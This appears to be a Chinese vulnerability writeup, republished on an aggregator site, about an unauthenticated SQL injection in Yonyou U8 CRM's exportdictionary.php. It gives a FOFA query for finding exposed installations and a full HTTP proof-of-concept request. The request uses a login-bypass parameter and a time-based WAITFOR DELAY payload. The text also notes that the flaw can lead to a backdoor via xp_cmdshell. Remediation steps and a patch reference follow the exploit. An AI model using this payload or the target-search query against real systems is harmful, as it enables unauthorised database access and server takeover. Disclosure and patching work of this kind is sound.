当前位置: 首页 > news >正文

用友U8-CRM-exportdictionarySQL注入

0 免责声明

请注意,使用本文章提供的任何信息所引发的任何后果,包括直接或间接的损失,均由使用者自行承担。我们强烈建议不要利用文中技术从事非法活动。如发现侵权问题,请及时告知以便我们删除相关内容。

1 漏洞名称

用友U8-CRM-exportdictionary-sql注入

产品介绍

用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。

3 漏洞威胁


用友 U8 CRM客户关系管理系统 exportdictionary.php 文件存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。

影响范围:

V16.1, V16.0, V15.1, V15.0, V13

漏洞环境 

FOFA:

title="用友U8CRM"

 

漏洞复现

PoC

GET /devtools/tools/exportdictionary.php?DontCheckLogin=1&value=1%27;WAITFOR+DELAY+%270:0:4%27-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bgsesstimeout-;
Connection: close

 

sqlmap验证

 

6 修复建议


第一步:在配置文件尾部追加如下段落即可

配置文件: U8SOFT\turbocrm70\apache\conf\httpd.conf,

在末尾添加一个配置:

Require local

其中,需要将中的u8安装路径修改为正确的安装路径

第二步:U8CRM存在SQL注入漏洞的安全补丁240828.zip

将解压文件中的U8SOFT目录覆盖产品安装目录。

第三步:修改完之后重启Apache4TurboCRM70服务

 

 

 


http://www.mrgr.cn/news/25484.html

相关文章:

  • Pywinauto鼠标操作指南
  • iOS 18 RC 版本更新,为相机应用引入了“暂停录制视频”功能
  • 3分钟教你学会Java抽象类
  • 牛客思维题———进制(简单)
  • mp3转文字要怎么处理?使用这4个工具就对了
  • 机器学习:逻辑回归--过采样
  • 代码随想录day21|回溯法02
  • 5个AI绘画免费,支持Midjourney【亲测有效】
  • 苍穹外卖——day1
  • 【JAVA入门】Day42 - 转换流
  • 004 【编译神器】Makefile:最常用编译方法详解
  • Linux - iptables防火墙
  • 【警告 C6031:返回值被忽略:scanf】
  • Linux计算文件权限的mode和umask
  • bug是什么意思
  • MySQL学习(函数整理)
  • go 笔记
  • 【复杂系统系列(中级)】Kolmogorov复杂度——信息的无序度量【通俗理解】
  • [001-02-001]. 第07-02节:线程的创建与使用
  • 《C++初始化列表陷阱:谨慎前行,避免潜在风险》